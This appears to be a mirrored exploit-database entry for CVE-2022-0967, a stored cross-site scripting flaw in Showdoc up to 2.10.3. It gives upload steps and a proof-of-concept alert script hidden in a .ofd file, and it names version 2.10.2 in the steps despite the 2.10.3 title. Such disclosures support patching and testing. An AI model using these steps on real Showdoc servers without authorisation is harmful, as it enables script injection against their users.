Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)

Exploit Author: Akshay Ravi Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2022-05-17

# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/star7th/showdoc
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
# Version: <= 2.10.3
# Tested on: macOS Monterey
# CVE : CVE-2022-0967

Description: Stored XSS via uploading file in .ofd format

1. Create a file with .ofd extension and add XSS Payload inside the file

filename = "payload.ofd"
payload = "<script>alert(1)</script>"

2. Login to showdoc v2.10.2 and go to file library

Endpoint = "https://www.site.com/attachment/index"

3. Upload the payload on file library and click on the check button
4. The XSS payload will executed once we visited the URL

Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)

درحال حاضر تحلیل هوش مصنوعی برای این اکسپلویت تولید نشده است!